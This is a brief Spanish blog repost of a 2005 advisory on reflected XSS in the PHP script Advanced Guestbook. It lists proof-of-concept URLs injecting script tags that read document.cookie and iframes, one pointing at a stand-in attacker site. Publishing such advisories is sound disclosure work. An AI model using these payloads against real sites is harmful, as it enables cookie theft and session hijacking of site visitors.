ecoestadistica.com

domingo, diciembre 25, 2005

Advanced Guestbook remote XSS

Advanced Guestbook es un script basado en PHP.
Index.php and comment.php scripts del php son vulnerables a los ataques de XSS. Este ¨error¨ puede permitir a un atacante puentear los filtros y realizar XSS, HTML
inyección y otros ataques.

Prueba de Concepto:

http://www.example.com/guestbook/index.php?entry=< script > alert(document.cookie);< / script>
http://www.example.com/guestbook/index.php?entry=< iframe
src=http://www.attackersite.com/>

http://www.example.com/guestbook/comment.php?gb_id=1< script >alert(document.cookie);< / script>
http://www.example.com/guestbook/comment.php?gb_id=1< IFRAME
SRC="javascript:alert('XSS');">< / IFRAME>

fuente:securitytracker

Salu2

ecoestadistica.com